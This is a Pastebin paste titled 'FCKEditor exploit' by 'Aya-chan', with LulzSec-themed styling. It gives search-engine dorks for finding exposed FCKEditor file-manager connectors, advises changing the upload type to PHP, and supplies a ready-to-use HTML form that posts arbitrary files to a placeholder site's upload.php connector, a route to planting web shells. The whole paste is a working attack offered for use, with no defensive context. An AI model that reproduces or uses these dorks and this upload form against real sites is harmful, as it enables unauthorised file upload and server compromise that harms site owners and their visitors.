Advertisement
AyaIshigawa

FCKEditor exploit ~Aya-chan

Dec 3rd, 2016
566
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. FCKEditor exploit ~Aya-chan
  2.  
  3. Dork:
  4. inurl:/uploadtest.html
  5. inurl:/fckeditor/editor/filemanager/browser/default/connectors/
  6.  
  7. Change upload type into: PHP
  8. enctype="text/plain"
  9.  
  10. HTML sample form exploit:
  11. -----------------------------------------------------------------------------------------------------------
  12. <!--
  13. Removing my name doesn't mean you discover/created this. ~ Aya-chan
  14. -->
  15. <head>
  16. <title>FCKEditor Upload Exploit</title>
  17. <style>
  18. body {
  19. background-image: url('http://boingboing.net/images/lulzsecp.jpg');
  20. background-repeat: no-repeat;
  21. background-size:cover;
  22. }
  23. </style>
  24. </head>
  25. <body bgColor="black">
  26. <br/><br/>
  27. <center>
  28. <img src="https://upload.wikimedia.org/wikipedia/en/thumb/7/7c/Lulz_Security.svg/903px-Lulz_Security.svg.png" width="300" alt="LulzSec"/><br/>
  29. <font color="black" size="+2" face="impact"> Fckeditor Upload Exploit [<font color="yellow" size="+2" face="impact">~Aya-chan</font>] </font>
  30. <form enctype="multipart/form-data" action="http://siteadi/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">
  31. <input style="font-color: white; font-face: verdana; font-size: 20px; background-color: gray;" name="NewFile" type="file"></input>
  32. <input style="font-color: white; font-face: verdana; font-size: 20px; background-color: blue;" type="submit" value="Upload"></input>
  33. </form>
  34. </center>
  35. </body>
  36. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement